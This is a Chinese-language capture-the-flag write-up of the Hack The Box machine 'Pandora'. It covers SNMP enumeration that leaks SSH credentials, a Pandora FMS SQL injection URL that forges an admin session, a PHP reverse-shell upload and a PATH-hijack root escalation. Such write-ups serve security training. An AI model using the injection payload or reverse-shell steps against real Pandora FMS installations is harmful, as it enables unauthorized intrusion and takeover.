目标地址:10.10.11.136 攻击机地址:10.10.14.24
1.信息搜集
首先Nmap扫描端口,扫描靶机的地址,得知 22(SSH)、80(Web)端口开放,那么先到web页面看看有没有什么信息或可利用点
命令:nmap -sS -sV -sC -T4 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds
这里我之前做的时候是直接解析成pandora.htb的,因历史解析的原因,这次做的时候直接访问到了。
第一次做pandora的时候,将域名解析地址写入hosts文件中即可。
访问到了web页面,没有发现什么有用的信息,扫描一下目录看看
目录也没有可用的信息,既然是靶场那么一定有突破点的。
用nmap再扫一下udp端口
这里可以看到snmp-netstat有我自己的ip地址,是因为在扫udp端口的时候我已经和靶机的snmp建立好了连接
命令:nmap -sS -sU -sC -sV -O -T4 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.32s latency).
Not shown: 998 closed tcp ports (reset), 994 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
22/udp open|filtered ssh
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 14.25 Mb sent, 14.25 Mb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.136 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:c8:18 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 18.62 Mb sent, 16.92 Mb received
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 13h44m13.92s (4945392 timeticks)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 13h44m14s
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.24:1079
| TCP 10.10.11.136:22 10.10.14.24:1081
| TCP 10.10.11.136:48448 10.10.14.2:4321
| TCP 10.10.11.136:48756 10.10.14.2:4321
| TCP 10.10.11.136:54026 10.10.14.2:4321
| TCP 10.10.11.136:54808 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
1885/udp open|filtered vrtstrapserver
16970/udp open|filtered unknown
20872/udp open|filtered unknown
37813/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/10%OT=22%CT=1%CU=2%PV=Y%DS=2%DC=I%G=Y%TM=6204DB45%P=
OS:i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O
OS:3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M508NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: pandora; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1124.37 seconds
扫描结束后可以看到有一个snmp协议(简单网络管理协议)开在udp 161端口上。
可以尝试使用snmpwalk对其进行连接,snmpwalk可以在net-snmp官网去下载到
2.漏洞利用
连接命令:snmpwalk.exe -v 2c -c public 10.10.11.136
IOD列表:http://www.ttlsa.com/monitor/snmp-oid/
可以看到这里面有很多信息,包括主机名字、网络接口数、CPU使用情况等信息。
其中有一串OID对应的是这样的信息
看起来像是账号和密码,靶机开启了SSH的端口,使用该账号密码进行ssh连接测试
username:daniel,password:HotelBabylon23
C:Userskami>ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 10 Feb 09:47:53 UTC 2022
System load: 0.08
Usage of /: 63.1% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 256
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Feb 9 19:49:10 2022 from 10.10.14.2
daniel@pandora:~$ whoami
daniel
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$
3.提权进行时
可以看到还有一个matt账户,在该账户下存在着user.txt应该就是flag了,但是没有权限查看,接下来就想办法提权到matt账户。
尝试进行suid sudo 计划任务提权,发现好像都没法进行提权。
curl一下自己看看呢。
拼接到url访问看看是个什么东西,为了便于展示,这里我将host文件进行了修改,ip对应到了pandora.htb域名
显示没找到,但是我在本机使用curl pandora.htb的时候明明可以看到呀。
ssh隧道来一波
C:Userskami>ssh -L 80:127.0.0.1:80 [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 10 Feb 10:04:59 UTC 2022
System load: 0.0
Usage of /: 63.1% of 4.87GB
Memory usage: 15%
Swap usage: 0%
Processes: 249
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Feb 10 09:47:54 2022 from 10.10.14.24
此时就代理成功了,浏览器直接访问127.0.0.1即可访问到靶机本地存在的web服务
页面标题就是 Pandora FMS 在页脚可以看到版本为v7.0NG.742_FIX_PERL2020
在https://cvedetails.com找到了对应的cve,存在着sql注入
可以看到在 pandora_console/include/chart_generator.php的session_id参数是注入点,那么直接丢进sqlmap跑一跑
跑出了库名,下一步表名,直到跑出session值。
+------------------------------------+
| taddress |
| taddress_agent |
| tagent_access |
| tagent_custom_data |
| tagent_custom_fields |
| tagent_custom_fields_filter |
| tagent_module_inventory |
| tagent_module_log |
| tagent_repository |
| tagent_secondary_group |
| tagente |
| tagente_datos |
| tagente_datos_inc |
| tagente_datos_inventory |
| tagente_datos_log4x |
| tagente_datos_string |
| tagente_estado |
| tagente_modulo |
| talert_actions |
| talert_commands |
| talert_snmp |
| talert_snmp_action |
| talert_special_days |
| talert_template_module_actions |
| talert_template_modules |
| talert_templates |
| tattachment |
| tautoconfig |
| tautoconfig_actions |
| tautoconfig_rules |
| tcategory |
| tcluster |
| tcluster_agent |
| tcluster_item |
| tcollection |
| tconfig |
| tconfig_os |
| tcontainer |
| tcontainer_item |
| tcredential_store |
| tdashboard |
| tdatabase |
| tdeployment_hosts |
| tevent_alert |
| tevent_alert_action |
| tevent_custom_field |
| tevent_extended |
| tevent_filter |
| tevent_response |
| tevent_rule |
| tevento |
| textension_translate_string |
| tfiles_repo |
| tfiles_repo_group |
| tgis_data_history |
| tgis_data_status |
| tgis_map |
| tgis_map_connection |
| tgis_map_has_tgis_map_con |
| tgis_map_layer |
| tgis_map_layer_groups |
| tgis_map_layer_has_tagente |
| tgraph |
| tgraph_source |
| tgraph_source_template |
| tgraph_template |
| tgroup_stat |
| tgrupo |
| tincidencia |
| titem |
| tlanguage |
| tlayout |
| tlayout_data |
| tlayout_template |
| tlayout_template_data |
| tlink |
| tlocal_component |
| tlog_graph_models |
| tmap |
| tmensajes |
| tmetaconsole_agent |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event |
| tmetaconsole_event_history |
| tmetaconsole_setup |
| tmigration_module_queue |
| tmigration_queue |
| tmodule |
| tmodule_group |
| tmodule_inventory |
| tmodule_relationship |
| tmodule_synth |
| tnetflow_filter |
| tnetflow_report |
| tnetflow_report_content |
| tnetwork_component |
| tnetwork_component_group |
| tnetwork_map |
| tnetwork_matrix |
| tnetwork_profile |
| tnetwork_profile_component |
| tnetworkmap_ent_rel_nodes |
| tnetworkmap_enterprise |
| tnetworkmap_enterprise_nodes |
| tnews |
| tnota |
| tnotification_group |
| tnotification_source |
| tnotification_source_group |
| tnotification_source_group_user |
| tnotification_source_user |
| tnotification_user |
| torigen |
| tpassword_history |
| tperfil |
| tphase |
| tplanned_downtime |
| tplanned_downtime_agents |
| tplanned_downtime_modules |
| tplugin |
| tpolicies |
| tpolicy_agents |
| tpolicy_alerts |
| tpolicy_alerts_actions |
| tpolicy_collections |
| tpolicy_groups |
| tpolicy_modules |
| tpolicy_modules_inventory |
| tpolicy_plugins |
| tpolicy_queue |
| tprofile_view |
| tprovisioning |
| tprovisioning_rules |
| trecon_script |
| trecon_task |
| trel_item |
| tremote_command |
| tremote_command_target |
| treport |
| treport_content |
| treport_content_item |
| treport_content_item_temp |
| treport_content_sla_com_temp |
| treport_content_sla_combined |
| treport_content_template |
| treport_custom_sql |
| treport_template |
| treset_pass |
| treset_pass_history |
| tserver |
| tserver_export |
| tserver_export_data |
| tservice |
| tservice_element |
| tsesion |
| tsesion_extended |
| tsessions_php |
| tskin |
| tsnmp_filter |
| ttag |
| ttag_module |
| ttag_policy_module |
| ttipo_modulo |
| ttransaction |
| ttrap |
| ttrap_custom_values |
| tupdate |
| tupdate_journal |
| tupdate_package |
| tupdate_settings |
| tuser_double_auth |
| tuser_task |
| tuser_task_scheduled |
| tusuario |
| tusuario_perfil |
| tvisual_console_elements_cache |
| twidget |
| twidget_dashboard |
+------------------------------------+
一共178张表,但是和session相关的只有三张表。
测试后选择dump tsessions_php表
+----------------------------+------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 226i87if97nt5hlqp51e9n8rrk | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1644436354 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 883c23eu7d1ndarij0qtg3kd12 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644437290 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| cs89puvbasun981denejfp64r2 | id_usuario|s:6:"daniel"; | 1644488590 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| eng03tpqsi5243hajufjtmbdh3 | NULL | 1644488794 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| gnniv81mf01km3js0874s9ktd3 | NULL | 1644437818 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| l33ouea0ibftaucjbdnv3spgfs | NULL | 1644488696 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| ng1n291iilod73mebktb2vfu29 | id_usuario|s:6:"daniel"; | 1644436001 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| r6greufnpiikl6i06q7lcjgmnd | NULL | 1644448880 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| vdoohnc7hlr1fglc7gamjqljrk | NULL | 1644488427 |
+----------------------------+------------------------------------------------------+-------------+
可以看到,有daniel和admin、matt的session记录在里面。
通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp
然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。
但是我这里在做的时候有人也在做,将后台页面覆盖为了一个cmd马的页面,所以只能直接执行命令了。
用python3反弹一个shell过来
成功拿到flag.
4.提权到root
首先看一下拥有suid权限的文件,这里看到有个pandora_backup为二进制文件
运行是会报错的,先不管,先生成ssh密钥文件进行ssh登录
生成ssh密钥,直接登录matt用户
生成之后 本地创建一个id_rsa 同样权限700 将生成的密钥粘贴进去
ssh连接即可
ssh连接之后,开始恶意伪造文件
创建一个tar,将matt的home路径注入环境变量,然后运行pandora_backup文件
此次靶场对我来说确实比较难,以至于全网搜索找寻wp.....
5.补充进入后台:
通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp
然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。
然后在 admin tools中找到file manager
点击上传,这里上传一个反弹shell的php即可,然后直接访问即可反弹。
上传后文件地址在pandora_console/images/ 下面
本地nc监听,访问http://127.0.0.1/pandora_console/images/1.php
即可收到。
参考文章:
https://zhuanlan.zhihu.com/p/458926451
https://blog.peterjbrowning.com/2022/01/htb-writeup-pandora
原文始发于微信公众号(暗魂攻防实验室):【社区精选】Hack The Box - Machines - Pandora
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论